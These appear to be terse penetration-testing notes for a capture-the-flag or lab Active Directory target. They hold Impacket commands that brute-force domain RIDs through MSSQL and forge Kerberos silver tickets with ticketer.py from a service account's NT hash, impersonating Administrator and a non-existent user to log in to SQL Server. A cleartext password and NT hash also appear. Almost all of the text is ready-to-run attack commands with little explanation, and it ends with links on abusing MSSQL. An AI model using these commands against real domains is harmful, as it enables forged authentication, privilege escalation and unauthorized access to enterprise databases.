# instead of reconnecting once per RID.
QUERY_FILE="$(mktemp)"
for RID in {1100..1200}; do
    echo "SELECT '$SID_BASE-$RID' AS sid, SUSER_SNAME(SID_BINARY(N'$SID_BASE-$RID')) AS name;" >> "$QUERY_FILE"
done

# mssqlsvc is a domain account, so authenticate with -windows-auth as in the working login above.
mssqlclient.py -windows-auth "$USERNAME:$PASSWORD@$SERVER" -file "$QUERY_FILE" | grep -a SIGNED
rm -f "$QUERY_FILE"


ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
            -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
            -domain signed.htb \
            -spn MSSQLSvc/DC01.signed.htb:1433 \
            -groups 1105 \
            -user-id 1103 \
            mssqlsvc

export KRB5CCNAME=mssqlsvc.ccache 

mssqlclient.py -k -no-pass dc01.signed.htb


purPLE9795!@:EF699384C3285C54128A3EE1DDB1A0CC

MSSQLSvc/DC01.signed.htb:1433

ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb Administrator

ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -user-id 500 Administrator

ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC -domain-sid S-1-5-21-4088429403-1159899800-2753317549 -domain signed.htb -spn MSSQLSvc/DC01.signed.htb:1433 -user-id 500 Administrator

export KRB5CCNAME=Administrator.ccache 

mssqlclient.py -k -no-pass signed.htb/administrator@signed.htb






Non-existent user:

ticketer.py -nthash 7d8ec69e03b35970bf147311fda8553e -domain-sid S-1-5-21-2287712982-2792323526-2734958516 -domain vhlnetworklab01.local MasterYoda


export KRB5CCNAME=MasterYoda.ccache 

proxychains python3 mssqlclient.py -k -no-pass vhlnetworklab01.local/administrator@WS021.vhlnetworklab01.local


Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

https://medium.com/@happycamper84/abusing-mssql-391f326003b9

https://stevestedman.com/2025/01/securing-sql-server-disable-ad-hoc-distributed-queries-2/

Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation
https://h4ms1k.github.io/Red_Team_MSSQL_Server/

https://www.akamai.com/blog/security/vollgar-ms-sql-servers-under-attack